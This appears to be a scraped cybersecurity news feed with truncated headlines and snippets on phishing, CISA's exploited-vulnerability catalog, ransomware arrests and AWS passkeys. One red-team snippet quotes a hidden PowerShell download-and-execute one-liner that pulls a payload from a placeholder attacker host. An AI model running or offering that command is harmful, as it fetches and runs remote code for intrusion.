Phishing emails abuse Windows search protocol to push malicious scripts
A new phishing campaign uses HTML attachments that abuse the Windows search protocol (search-ms URI) to push batch files hosted on remote servers that deliver malware.…
Author: Cybernoz
CISA adds Arm Mali GPU Kernel Driver, PHP bugs to its Known Exploited Vulnerabilities catalog
CISA adds Arm Mali GPU Kernel Driver, PHP bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini June 12, 2024 U.S. Cybersecurity and Infrastructure Security…
Piercing the Veil: Server Side Request Forgery to NIPRNet access | by Alyssa Herrera
The second Jira website I discovered was surprisingly harder to exploit. It didn’t give me the verbose errors like the one I discussed and showed…
Researchers Discover Vulnerabilities In Biometric Terminals
Kaspersky researchers discovered widespread vulnerabilities in biometric terminals developed by ZKTeco, which are known to be deployed internationally. These flaws could be exploited by threat…
ADHA extracts $1m in service credits from Accenture – Cloud – Hardware – Software
The Australian Digital Health Agency has claimed $1.04 million in service credits from Accenture, the outsourced operator of My Health Record infrastructure, since January 2018.…
Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation
Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation Pierluigi Paganini June 12, 2024 The Ukraine cyber police arrested…
Defence to build a ‘top secret’ analytics capability – Software
Defence is set to convert a secret advanced analytics project it has been researching into an actual operational capability. The department recently sought software engineers…
Hacking Pulse Secure for Redteaming
The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))” Setting up Cobalt Strike Now…
Ukraine Arrests Cryptor Specialist Aiding Conti and LockBit Ransomware
In a major victory against ransomware operators, Ukrainian police have apprehended a Ukrainian national suspected of aiding the notorious ransomware groups, Conti and LockBit for…
Black Basta Ransomware Possibly Exploited Windows Bug As 0-Day
The Black Basta ransomware gang may have exploited a Windows privilege escalation vulnerability as a zero-day before it was patched, new evidence suggests. Symantec researchers…
SpaceX sued by engineers fired after accusing Elon Musk of sexism – Training & Development
Rocket maker SpaceX and its CEO Elon Musk were sued by eight engineers who say they were illegally fired for raising concerns about alleged sexual…
AWS adds passkeys support, warns root users must enable MFA
Amazon Web Services (AWS) has introduced FIDO2 passkeys as a new method for multi-factor authentication (MFA) to enhance account security and usability. Additionally, as announced…